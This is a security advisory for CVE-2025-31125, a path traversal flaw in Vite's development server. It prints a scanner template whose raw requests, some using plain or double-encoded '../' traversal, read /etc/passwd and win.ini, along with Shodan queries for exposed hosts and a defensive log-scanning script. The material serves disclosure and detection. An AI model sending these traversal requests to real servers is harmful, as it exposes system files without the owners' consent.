CVE-2025-31125: Vite Development Server - Path Traversal

Date: 2025-08-01 | Affected software: Vite Development Server | PoC: publicly available

Vulnerability description

Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.

PoC code [publicly available]

id: CVE-2025-31125

info:
  name: Vite Development Server - Path Traversal
  author: martian,ritikchaddha,v2htw
  severity: medium
  description: |
    Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.
  remediation: |
    Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server
  reference:
    - https://github.com/vitejs/vite/issues/8498
    - https://github.com/vitejs/vite/pull/8804
    - https://github.com/vitejs/vite/pull/8979
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31125
    epss-score: 0.06978
    epss-percentile: 0.91088
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 4
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi,vkev

http:
  - raw:
      - |
        GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "data:application/octet-stream"
          - "base64"
          - "import init"
        condition: and

      - type: word
        part: header
        words:
          - "text/javascript"
# digest: 4b0a00483046022100b9052e65d6c1f23a0bb7cd6037e06c20e00d825a29bae95a4a2b8eff84077815022100cd484d872094aad9624788c8fa21663d062b31c9f3538d4d67744a57930e842c:922c64590222798bb761d5b6d8e72950
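
A defender-side check for the request shape the template above sends, as an added example (not part of the template or of Vite's own code): it scans access-log lines for /@fs/ requests that carry the import, inline= and .wasm?init query markers, and percent-decodes repeatedly so the double-encoded traversal form is also caught. The log format, the function names and the sample lines are assumptions constructed for illustration.

```javascript
// Added example: flag access-log lines that match the probe shape in the template above.
// Assumptions: common-log-style lines with the request line in double quotes;
// SAMPLE_LOG is constructed for illustration.

// Percent-decode repeatedly so a double-encoded "%252e" is normalised to ".".
function deepDecode(s, rounds = 3) {
  let cur = s;
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; } // malformed escape: stop
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Return null for a benign request target, or the reasons it looks like the probe.
function classifyFsRequest(target) {
  const q = target.indexOf("?");
  const path = deepDecode(q === -1 ? target : target.slice(0, q)).replace(/\\/g, "/");
  const query = deepDecode(q === -1 ? "" : target.slice(q + 1));
  if (!path.startsWith("/@fs/")) return null;
  const reasons = [];
  // Query markers taken from the template's requests: import, inline=, .wasm?init
  if (/(^|[&?])import(&|=|$)/.test(query) && query.includes("inline=") &&
      query.includes(".wasm?init")) reasons.push("import/inline/wasm-init query");
  if (path.split("/").includes("..")) reasons.push("dot-dot segment after decoding");
  return reasons.length ? { path, reasons } : null;
}

// Scan log lines and collect the suspicious /@fs/ requests.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = /"(?:GET|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
    const verdict = m && classifyFsRequest(m[1]);
    if (verdict) hits.push({ target: m[1], ...verdict });
  }
  return hits;
}

const SAMPLE_LOG = [ // constructed lines, documentation-range addresses
  '192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /@fs/home/dev/app/node_modules/vue/dist/vue.js?v=1a2b HTTP/1.1" 200 5120',
  '198.51.100.7 - - [01/Aug/2025:10:00:05 +0000] "GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1" 200 2048',
  '198.51.100.7 - - [01/Aug/2025:10:00:06 +0000] "GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1" 200 2048',
  '192.0.2.10 - - [01/Aug/2025:10:00:09 +0000] "GET /src/main.ts?import HTTP/1.1" 200 900',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

A hit with a 200 status on a dev server that was started with --host or a non-local server.host is the case the remediation text above is about; ordinary /@fs/ module loads and plain ?import requests are not flagged.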
